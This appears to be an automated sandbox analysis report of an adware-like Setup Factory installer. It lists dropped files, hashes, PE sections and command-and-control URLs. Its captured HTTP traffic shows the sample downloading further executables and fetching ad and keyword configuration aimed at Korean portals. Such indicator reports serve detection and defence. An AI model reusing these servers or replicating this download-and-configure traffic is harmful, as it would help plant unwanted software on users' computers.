a85474b0c3c1be97707e3fa74091421e c:\Documents and Settings\"%CurrentUserName%"\Application Data\MicroLab\MyEngin\Common\MicroProCon.exe
fa1a41b05a5029cb2a500b1dbe2d17e8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\MicroLab\MyEngin\Common\MicroProProc.exe
3fe7c92dba5c9240b4ab0d6a87e6166a c:\Documents and Settings\"%CurrentUserName%"\Application Data\MicroLab\MyEngin\Common\Uninstall\Uninstall.exe
c3a2676fd2bec4903dea49c7e31f890b c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\Uninstall\Uninstaller.exe
545ee651a6d3a161ec0e58f7cc7513c1 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrCon.exe
22a5ebecadefbe088ff9caa5549a22d7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\WinCtrView\Engin\ProVersion\WinCtrProc.exe
3fe7c92dba5c9240b4ab0d6a87e6166a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe
545ee651a6d3a161ec0e58f7cc7513c1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrCon[1].exe
22a5ebecadefbe088ff9caa5549a22d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\GLOPEDUF\WinCtrProc[1].exe
fa1a41b05a5029cb2a500b1dbe2d17e8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\H1X4NWCF\MicroProProc[1].exe
c3a2676fd2bec4903dea49c7e31f890b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Q8D9JNNV\Uninstall_Ctr[1].exe
90a39346e9b67f132ef133725c487ff6 c:\WINDOWS\system32\MSINET.OCX
84742b5754690ed667372be561cf518d c:\WINDOWS\system32\VB6KO.DLL

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Setup Factory 8.0 Runtime
Product Version: 8.2.1.0
Legal Copyright: Setup Engine Copyright (c) 2004-2009 Indigo Rose Corporation
Legal Trademarks: Setup Factory is a trademark of Indigo Rose Corporation.
Original Filename: suf80_launch.exe
Internal Name: suf80_launch
File Version: 8.2.1.0
File Description: Setup Application
Comments: Created with Setup Factory 8.0
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 28836 32768 4.26507 a8dbcac095aef6f1ff0f56e91c5abc15
.rdata 36864 10370 12288 3.44532 efb6029b9a5f70171975f6b5a16c78ce
.data 49152 6440 4096 1.54728 cf8d7dd9f4b828868db85743b8601f51
.rsrc 57344 28040 28672 4.06487 05962a2c16ea40395e7b662814eba9fd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 57
0e1bf09cea8e7cf2d8ff215b54ccc3ff
f3ce66c697219589c555b2bcaea2ec36
4505d9a1286f7e0139c339736549c04c
7724d3f50638529ce10ddce46d50b566
96e429733d0efca88ba8104c870597c5
670c94280fdc3b0cb140feae731d4c0d
fbfcdce934c48bdd5dc887d009f63d9a
60450ad8dbc5eb1a94e67560af5512f5
16e80409037afd6531a3c25648efd36a
49ecea57d92bc3f004d63a13998ed827
a49308a10aaee870b0df1a54629f8e17
60c64e1ff797f0586d4e4fa8b71590fb
662f48cd18a06ab7fa7a036c39dd5009
a05a82856ecb0e9f04dee5f2b945355c
c3150d4a50452db71ce563353ba982af
d96bf3515187f64e04bc30c105eeffaa
c0bf80b9314aec2b1dca0dcb2662f42d
4f2dafde6729cd7069faa9e1a06ecedb
1dc3cb8f363bde761d4cff6e874f7609
7228c9c464e45dfc0264a4019ca146fb
2597664b2e6285188d3d631b91994a18
75661c1238712c2f813f39573d17e3e7
0fbdc557bdaf578aaa19147db21e4012
43f8dcc02375f67a0e411919bd06b54a
e4c660519851bbe292368e3a7cb00ca9

URLs

URL IP
hxxp://mainserver.kr/Config/ServerList.asp?n=3030 220.73.162.57
hxxp://hostserver.kr/Config/ServerList.asp?uno=3030 220.73.162.54
hxxp://220.73.162.27/Config/FormChecktimemicroLab.asp
hxxp://220.73.162.46/Config/ProgramGuard.asp?uno=3030&ver=0000&wver=5
hxxp://220.73.162.27/Config/ProgramUpdateLab.asp?version=1208
hxxp://220.73.162.4/Download/MicroProProc.exe
hxxp://hostserver.kr/Config/AdNw/StakePsList.asp?uno=5 220.73.162.54
hxxp://220.73.162.29/Config/FormLocation.asp
hxxp://220.73.162.29/Config/AdNw/FcPimSLab.asp
hxxp://220.73.162.29/Config/newConf/UCg_LPrMLab.asp?user_no=3
hxxp://220.73.162.29/Config/TransSiteString.asp?nation=KOREA
hxxp://220.73.162.4/Download/WinCtrCon.exe
hxxp://makevalue.com/Config/sTakeList.asp?n=3 220.73.162.46
hxxp://220.73.162.23/Config/AdNw/FcTimeLab.asp
hxxp://220.73.162.23/Config/NewConf/ProgramUpdateLab.asp?version=1681
hxxp://220.73.162.3/Download/WinCtrProc.exe
hxxp://maketop.kr/Config/AdNw/StakePsList.asp?uno=3 220.73.162.49
hxxp://220.73.162.37/Config/FormLocation.asp
hxxp://220.73.162.37/Config/AdNw/FcPimSLab.asp
hxxp://220.73.162.37/Config/newConf/UCg_LPrMLab.asp?user_no=3
hxxp://220.73.162.37/Config/TransSiteString.asp?nation=KOREA
hxxp://220.73.162.37/config/keyword_platinum.asp?user_no=3&SubName=MAIN
hxxp://220.73.162.37/Config/ipget.asp?kn=first&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681
hxxp://220.73.162.37/Config/ipget.asp?kn=every&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681
hxxp://loadform.co.kr/Download/Uninstall_Ctr.exe 220.73.162.14


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /Config/sTakeList.asp?n=3 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: makevalue.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCTCDQBC=ABCEJILDHGLDIHLIFCFGACJL; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:24 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..hXXp://220.73.162.25,..hXXp://220.73.162.26,..
hXXp://220.73.162.27,..hXXp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..hXXp://220.73.162.31,..
hXXp://220.73.162.32,..hXXp://220.73.162.33,..hXXp://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..
hXXp://220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..hXXp://220.73.162.40,..hXXp://220.73.162.41,..
hXXp://220.73.162.42,..hXXp://220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://220.73.162.46,..
hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://220.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..
hXXp://220.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.73.162.55,..hXXp://220.73.162.56,..
hXXp://220.73.162.57,..hXXp://220.73.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73.162.61..


GET /Download/WinCtrProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.3
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 28 Nov 2014 05:31:37 GMT
Accept-Ranges: bytes
ETag: "3ae67894ccad01:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:15:22 GMT
Content-Length: 851416
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:.
.,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L...T.sT......
...............P.......r............@.................................
{...........................................(.........................
..................................................0... ...............
.....................text............................... ..`.data....5
[email protected]...............................@..@
l.[J............MSVBVM60.DLL..........................................
......................................................................

<<< skipped >>>

GET /Config/FormChecktimemicroLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.27
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/8.0
Set-Cookie: ASPSESSIONIDSSBBASCC=DDDMIILDMMNGPHCEICAHNOMB; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:47 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,hXXp://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|120|Y|Y|Y|Y|Y|Y..
....



GET /Config/ProgramUpdateLab.asp?version=1208 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.27
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBBASCC=DDDMIILDMMNGPHCEICAHNOMB


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:47 GMT
1656|MicroProProc.exe..


GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:05 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..
hXXp://cafe.naver.com/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..
hXXp://kin.naver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..
hXXp://news.naver.com|961|C|962|50|R|L|8|8|283#..
hXXp://section.blog.naver.com|961|C|962|50|R|L|8|8|283#..
hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#..
hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..
hXXp://VVV.naver.com|882|C|882|260|R|L|6|6|255#..
hXXp://agora.media.daum.net|978|C|58.34|900|R|L|9|9|430#..
hXXp://agoraplaza.media.daum.net/petition/petition.do?|978|C|58.34|900|R|L|9|9|430#..
hXXp://blog.daum.net/?|978|C|58.34|900|R|L|9|9|430#..
hXXp://blog.daum.net/_blog/_top|978|C|58.34|900|R|L|9|9|430#..
hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430#..
hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/event/event_list.html?|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/?_top_blogtop=navi_cafehome|978|C|58.34|900|R|L|9|9|430#..
hXXp://cafe.daum.net/top/top.html?_top_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..
hXXp://cartoon.media.daum.net|978|C|58.34|900|R|L|9|9|430#..
hXXp://issue.media.daum.ne

<<< skipped >>>

GET /Config/AdNw/FcPimSLab.asp HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:05 GMT
5|5|60|hXXp://loadform.co.kr/Download,hXXp://220.73.162.2/Download,htt
p://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|
120|Y|Y|Y|Y|Y|Y..
....



GET /Config/newConf/UCg_LPrMLab.asp?user_no=3 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 314
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:24:06 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:05 GMT
KOREA|Y|N|N|N|hXXp://|Y|N|N|0|hXXp://220.73.162.55/config/LanguageTran
slate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://k
r.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=
[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|
Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|
....



GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12071
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:06 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?
p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u]
,ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com
/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1
],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.
yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWO
RD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http
://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.y
ahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.
com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http:
//fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://tran
slate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JA
PAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http
://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF
-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.n
aver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[
1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.se
arch.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][
KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,h
ttp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog

<<< skipped >>>

GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:30 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.co
m/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.na
ver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.
com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962
|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#
..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.
naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|
C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/pe
tition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|
58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|90
0|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430
#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http
://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..h
ttp://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9
|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|90
0|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34
|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|5
8.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C
|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafeh
ome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_t
op_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media
.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne

<<< skipped >>>

GET /Config/AdNw/FcPimSLab.asp HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:30 GMT
5|5|60|hXXp://loadform.co.kr/Download,hXXp://220.73.162.2/Download,htt
p://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|
120|Y|Y|Y|Y|Y|Y..
....



GET /Config/newConf/UCg_LPrMLab.asp?user_no=3 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 314
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:31 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:30 GMT
KOREA|Y|N|N|N|hXXp://|Y|N|N|0|hXXp://220.73.162.55/config/LanguageTran
slate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://k
r.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=
[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|
Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|
....



GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24143
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:31 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?
p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u]
,ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com
/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1
],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.
yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWO
RD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http
://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.y
ahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.
com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http:
//fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://tran
slate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JA
PAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http
://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF
-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.n
aver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[
1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.se
arch.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][
KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,h
ttp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog

<<< skipped >>>

GET /config/keyword_platinum.asp?user_no=3&SubName=MAIN HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4784
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:31 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:31 GMT
[icon][/icon][startpage][/startpage][startpop][/startpop][popup][/popu
p][adminkeywordpop]N|1024*750|1|..........^±¤°í´ëÇà»
ç^광고대행사
###N|1024*750|2|..........^Ű¿öµå±¤°í^키ì
›Œë“œê´‘ê³  ###N|1024*750|3|
http:VVV.naver.com^http:naver.com ###N|1024*750|4|
http:VVV.daum.net ###N|1024*750|5|http:kr.yahoo.co
m ###N|1024*750|6|http:VVV.paran.com
###N|1024*750|7|http:VVV.netmarble.net ###N
|1024*750|8|http:VVV.gajai.com ###N|1024*750|9|htt
p:VVV.korea.com^http:VVV.freechal.com^http:VVV.dreamwiz.com
###N|1024*750|10|http:VVV.chol.com^http:kr.msn.com^http:VVV.
hanafos.com ###N|1024*750|11|http:VVV.imbc.com^htt
p:VVV.chosun.com^http:VVV.sportsseoul.com^http:VVV.edaily.co.kr
###N|1024*750|12|http:VVV.soribada.com
###N|1024*750|13|http:VVV.hangame.com^http:VVV.sayclub.com
###N|1024*750|14|http:VVV.gmarket.co.kr^http:VVV.interpark
.com ###N|1024*750|15|http:VVV.buddybuddy.co.kr
###N|1024*750|16|http:sample.naver.com^.............
... ###N|1024*750|17|http:zusoo.com^http:VVV.nugun
i.com^http:VVV.emdb.co.kr^http:VVV.unitel.co.kr^http:VVV.totalplaza.co
m ###N|1024*750|18|http:VVV.tworld.co.kr^http:

<<< skipped >>>

GET /Config/ipget.asp?kn=first&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:32 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:31 GMT
....



GET /Config/ipget.asp?kn=every&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681 HTTP/1.1

Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:32 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:32 GMT


GET /Download/MicroProProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.4
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 01 Sep 2014 06:19:11 GMT
Accept-Ranges: bytes
ETag: "31bdfa5acc5cf1:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:14:52 GMT
Content-Length: 839160

<<< skipped >>>

GET /Config/ServerList.asp?n=3030 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: mainserver.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDQRRRD=MHPAFILDLKPBKIJGADDOBBKJ; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:49 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..


GET /Download/WinCtrCon.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.4
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
